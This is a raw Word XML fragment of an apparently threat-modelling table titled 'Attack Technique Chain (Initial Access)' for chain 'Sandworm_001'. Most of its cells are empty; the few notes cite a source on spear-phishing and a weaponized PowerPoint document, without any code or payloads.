          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4FDE6CD7" w14:textId="77777777" w:rsidR="006C558F" w:rsidRDefault="006C558F" w:rsidP="00CB5B96">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23025943" w14:textId="77777777" w:rsidR="006C558F" w:rsidRDefault="006C558F" w:rsidP="00CB5B96">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C271B0F" w14:textId="77777777" w:rsidR="006C558F" w:rsidRDefault="006C558F" w:rsidP="00CB5B96">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2C740FF2" w14:textId="77777777" w:rsidR="00706361" w:rsidRDefault="00706361" w:rsidP="00706361"/>
    <w:p w14:paraId="7B948536" w14:textId="77777777" w:rsidR="00706361" w:rsidRDefault="00706361" w:rsidP="00706361">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r>
        <w:t>Attack Technique Chain (Initial Access)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="10456" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="562"/>
        <w:gridCol w:w="1134"/>
        <w:gridCol w:w="1418"/>
        <w:gridCol w:w="709"/>
        <w:gridCol w:w="708"/>
        <w:gridCol w:w="567"/>
        <w:gridCol w:w="993"/>
        <w:gridCol w:w="4365"/>
      </w:tblGrid>
      <w:tr w:rsidR="00947702" w:rsidRPr="002D1D50" w14:paraId="7E76367B" w14:textId="77777777" w:rsidTr="00947702">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="0BC761B4" w14:textId="77777777" w:rsidR="0024244B" w:rsidRDefault="0024244B" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="7AFBFE3E" w14:textId="77777777" w:rsidR="0024244B" w:rsidRPr="002D1D50" w:rsidRDefault="0024244B" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Chain_ID</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="30559825" w14:textId="18ADE420" w:rsidR="0024244B" w:rsidRPr="002D1D50" w:rsidRDefault="0024244B" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Sandworm_001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="709" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="5EBA9496" w14:textId="77777777" w:rsidR="0024244B" w:rsidRPr="002D1D50" w:rsidRDefault="0024244B" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="708" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="1F788953" w14:textId="75128859" w:rsidR="0024244B" w:rsidRPr="002D1D50" w:rsidRDefault="0024244B" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Ver</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="112BB76F" w14:textId="332281BF" w:rsidR="0024244B" w:rsidRDefault="0024244B" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="36E333D5" w14:textId="7A600084" w:rsidR="0024244B" w:rsidRPr="002D1D50" w:rsidRDefault="0024244B" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4365" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="45483717" w14:textId="77777777" w:rsidR="0024244B" w:rsidRPr="002D1D50" w:rsidRDefault="0024244B" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00947702" w:rsidRPr="002D1D50" w14:paraId="40F3B3F8" w14:textId="77777777" w:rsidTr="00947702">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="181517AE" w14:textId="77777777" w:rsidR="0024244B" w:rsidRPr="002D1D50" w:rsidRDefault="0024244B" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7C3A1F96" w14:textId="77777777" w:rsidR="0024244B" w:rsidRPr="002D1D50" w:rsidRDefault="0024244B" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5CDAB23B" w14:textId="77777777" w:rsidR="0024244B" w:rsidRPr="002D1D50" w:rsidRDefault="0024244B" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="709" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4CF45B46" w14:textId="77777777" w:rsidR="0024244B" w:rsidRPr="002D1D50" w:rsidRDefault="0024244B" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="708" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1DE36421" w14:textId="77777777" w:rsidR="0024244B" w:rsidRPr="002D1D50" w:rsidRDefault="0024244B" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0BF46DF3" w14:textId="77777777" w:rsidR="0024244B" w:rsidRPr="002D1D50" w:rsidRDefault="0024244B" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="555E5E1A" w14:textId="10B1B188" w:rsidR="0024244B" w:rsidRPr="002D1D50" w:rsidRDefault="0024244B" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4365" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="204CE4D6" w14:textId="77777777" w:rsidR="0024244B" w:rsidRPr="002D1D50" w:rsidRDefault="0024244B" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00947702" w:rsidRPr="002D1D50" w14:paraId="1B130C6C" w14:textId="77777777" w:rsidTr="00947702">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="604BFCD8" w14:textId="77777777" w:rsidR="0024244B" w:rsidRPr="002D1D50" w:rsidRDefault="0024244B" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E2FDCCF" w14:textId="77777777" w:rsidR="0024244B" w:rsidRPr="002D1D50" w:rsidRDefault="0024244B" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Tactic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D36D214" w14:textId="77777777" w:rsidR="0024244B" w:rsidRPr="002D1D50" w:rsidRDefault="0024244B" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="709" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B264425" w14:textId="77777777" w:rsidR="0024244B" w:rsidRPr="002D1D50" w:rsidRDefault="0024244B" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Pred</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="708" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="149F2B4C" w14:textId="2E4F895A" w:rsidR="0024244B" w:rsidRPr="002D1D50" w:rsidRDefault="0024244B" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>TInc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3EA198B0" w14:textId="4DD8516E" w:rsidR="0024244B" w:rsidRPr="002D1D50" w:rsidRDefault="0024244B" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>S/G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="36113B73" w14:textId="56B025A9" w:rsidR="0024244B" w:rsidRPr="002D1D50" w:rsidRDefault="0024244B" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>KC Step</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4365" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E2275EE" w14:textId="77777777" w:rsidR="0024244B" w:rsidRPr="002D1D50" w:rsidRDefault="0024244B" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00947702" w:rsidRPr="00B857D7" w14:paraId="24005F5A" w14:textId="77777777" w:rsidTr="00947702">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44D0405C" w14:textId="77777777" w:rsidR="0024244B" w:rsidRPr="00B857D7" w:rsidRDefault="0024244B" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0441DAF3" w14:textId="77777777" w:rsidR="0024244B" w:rsidRPr="00B857D7" w:rsidRDefault="0024244B" w:rsidP="0024244B">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1418" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D79415D" w14:textId="77777777" w:rsidR="0024244B" w:rsidRPr="00B857D7" w:rsidRDefault="0024244B" w:rsidP="0024244B">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709" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5FCD899D" w14:textId="1D76B51A" w:rsidR="0024244B" w:rsidRPr="00B857D7" w:rsidRDefault="00573F44" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="708" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E5A25CA" w14:textId="77777777" w:rsidR="0024244B" w:rsidRPr="00B857D7" w:rsidRDefault="0024244B" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="63F26060" w14:textId="7EB8C904" w:rsidR="0024244B" w:rsidRPr="00B857D7" w:rsidRDefault="0024244B" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B253D8D" w14:textId="16963A2F" w:rsidR="0024244B" w:rsidRPr="00B857D7" w:rsidRDefault="00E32B30" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-DEL/IF-SEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4365" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0EB72B2F" w14:textId="3AA1F65C" w:rsidR="0024244B" w:rsidRPr="00A5536D" w:rsidRDefault="00A5536D" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">[2] </w:t>
            </w:r>
            <w:r w:rsidRPr="001E2EDA">
              <w:t>On September 3rd, our research and labs teams discovered that the spear-phishing attacks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00947702" w:rsidRPr="00B857D7" w14:paraId="4FD452DE" w14:textId="77777777" w:rsidTr="00947702">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D56B8CB" w14:textId="77777777" w:rsidR="0024244B" w:rsidRPr="00B857D7" w:rsidRDefault="0024244B" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42FC06F5" w14:textId="77777777" w:rsidR="0024244B" w:rsidRPr="00B857D7" w:rsidRDefault="0024244B" w:rsidP="0024244B">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1418" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59A3BC38" w14:textId="77777777" w:rsidR="0024244B" w:rsidRPr="00B857D7" w:rsidRDefault="0024244B" w:rsidP="0024244B">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709" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79789AAA" w14:textId="77777777" w:rsidR="0024244B" w:rsidRPr="00B857D7" w:rsidRDefault="0024244B" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="708" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4BF914D3" w14:textId="77777777" w:rsidR="0024244B" w:rsidRPr="00B857D7" w:rsidRDefault="0024244B" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B337B1E" w14:textId="1204996A" w:rsidR="0024244B" w:rsidRPr="00B857D7" w:rsidRDefault="0024244B" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="22D2624C" w14:textId="59B057C1" w:rsidR="0024244B" w:rsidRPr="00B857D7" w:rsidRDefault="00E32B30" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-SEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4365" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7C11BEDE" w14:textId="2A0C2D32" w:rsidR="0024244B" w:rsidRPr="00A5536D" w:rsidRDefault="00A5536D" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[2] </w:t>
            </w:r>
            <w:r w:rsidRPr="001E2EDA">
              <w:t>A weaponized PowerPoint document was observed in these attacks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00947702" w:rsidRPr="00B857D7" w14:paraId="1976AE93" w14:textId="77777777" w:rsidTr="00947702">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F7BF12E" w14:textId="77777777" w:rsidR="0024244B" w:rsidRPr="00B857D7" w:rsidRDefault="0024244B" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70E04614" w14:textId="77777777" w:rsidR="0024244B" w:rsidRPr="00B857D7" w:rsidRDefault="0024244B" w:rsidP="0024244B">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1418" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66ED5B55" w14:textId="77777777" w:rsidR="0024244B" w:rsidRPr="00B857D7" w:rsidRDefault="0024244B" w:rsidP="0024244B">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709" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3AD5C5A3" w14:textId="77777777" w:rsidR="0024244B" w:rsidRPr="00B857D7" w:rsidRDefault="0024244B" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="708" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1DD32A4E" w14:textId="77777777" w:rsidR="0024244B" w:rsidRPr="00B857D7" w:rsidRDefault="0024244B" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
